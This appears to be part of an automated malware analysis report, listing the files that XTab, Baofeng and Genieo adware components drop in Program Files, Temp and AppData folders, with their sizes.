%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (3 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\default_add_logo_hover.png (1 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (22156 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5312 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
%Program Files% (x86)\XTab\web\img\default_add_logo.png (1 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (3 bytes)
%Program Files% (x86)\XTab\web\js\xagainit.js (3 bytes)
%Program Files% (x86)\XTab\web\img\googlelogo2.png (1526 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\img\default_logo.png (5 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (6812 bytes)
%Program Files% (x86)\XTab\web\js\ie8.js (156 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (17526 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\conf (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\BaofengUpdate.exe (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\uninstallDlg2.xml (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\1.zip (197497 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\2.zip (47952 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SH2TVRCI\2[1].zip (70180 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\ffsearch_toolbar!1.0.0.1025.xpi (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\UninstallManager.exe (59286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\lpd#4.3.0.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\1[1].zip (296615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_white.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui.js (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\buttonBg.png (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_data.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1sm.png (769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\GenieoPartnerWindow.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame1sm.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\red.gif (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\main.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_bg.jpg (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\settings.tpl (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\button.png (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\notification.html (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\warming_up.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\opera_extension.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\notification_controls.png (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\Preferences.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extOpera1.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_image_frame.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frameSm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8sm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_fr.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tryAgainButton.png (710 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\fr.css (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\miniview.html (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvAF24.tmp (82165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows_blue.png (277 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_ru.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\heart.png (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\ServerConnector.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cmd_close_red.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieoRss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\notification.html (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\buttonSp.png (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\partner_item_bg.gif (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_image.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.project (487 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\set_full_view_btn.png (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewPublish.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\birthday.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin1.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\button.png (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\title.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.jsonp.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\okCancelButton.png (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.png (876 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\notification_popup_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\bummer.png (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac3.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\hotItemIcon.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\happy.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_6.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_icons.png (893 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSqSm.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac1.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitterButton.png (955 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\h_bg.png (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.properties (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\attention.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\settings.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\favorite_site_mask.png (176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\aggregation.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-pack.js (15168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_btn.png (625 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\big_quote.gif (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_note.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DataProcessor.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-overcast.png (975 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac1.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ohBg.gif (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\layer.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar_prog.gif (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\upper_border.gif (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear-night.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_facebook_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.json (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\round_corners_5px.png (182 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton.jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_4.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar_prog.gif (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie8.css (745 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\item_bg.png (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\picFrames.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_application.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template1.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\slideshow.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\constants.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\share_btn.png (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\pagelet.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\browser_not_supported.html (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\smallGrey.gif (803 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\covers.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\footer_bg.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_arrow.gif (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sidebar_text_ad_bg.png (564 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down.gif (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFinishButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\analytics.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\itemsRotate.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1_.jpg (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rssButton.png (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3sm.jpg (7192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\hp_guard.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grad.png (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template2.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_btn.png (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sad.png (971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\login_facebook_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bug.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\json.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3sm.png (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next2.gif (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\logDbgLoadPhase.js (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\social_connector.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds-night.png (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tw.gif (241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\bg.jpg (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\set_to_miniview.png (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grey.gif (817 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\utils.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_heart.png (765 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_3.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fbButton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\share_popup_arrow.png (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\personalization_meter_bg.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\utils.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1.jpg (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Activators.js (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\noitems.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\followbutton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\logo_icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_fr.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_up.png (697 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\splash.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\default_image.jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\classes.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton.png (863 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_main.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_not_connected_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\warning.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\pagging_arrows.png (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\bug.png (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\LocationManager.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\birthday_cake.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\small_arrow_down.png (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow.png (849 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMac.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_5.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar.gif (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\buttonSp.png (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\topic_x.png (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie7.css (1 bytes)
